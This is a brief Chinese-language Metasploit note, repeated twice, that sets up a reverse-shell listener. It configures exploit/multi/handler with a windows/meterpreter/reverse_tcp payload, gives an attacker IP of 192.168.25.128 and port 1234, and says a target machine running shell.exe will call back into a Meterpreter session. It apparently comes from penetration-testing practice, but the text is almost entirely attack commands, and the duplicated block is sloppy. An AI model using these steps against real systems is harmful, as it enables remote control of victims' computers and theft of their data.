启动 msfconsole
msfconsole下依次执行如下命令
[use exploit/multi/handler]
[set payload windows/meterpreter/reverse_tcp]
//192.168.25.128是攻击机IP
[set LHOST 192.168.25.128]
[set LPORT 1234]
[run] 开始监听即可
靶机执行shell.exe即可反弹meterprete
启动 msfconsole
msfconsole下依次执行如下命令
[use exploit/multi/handler]
[set payload windows/meterpreter/reverse_tcp]
//192.168.25.128是攻击机IP
[set LHOST 192.168.25.128]
[set LPORT 1234]
[run] 开始监听即可
靶机执行shell.exe即可反弹meterprete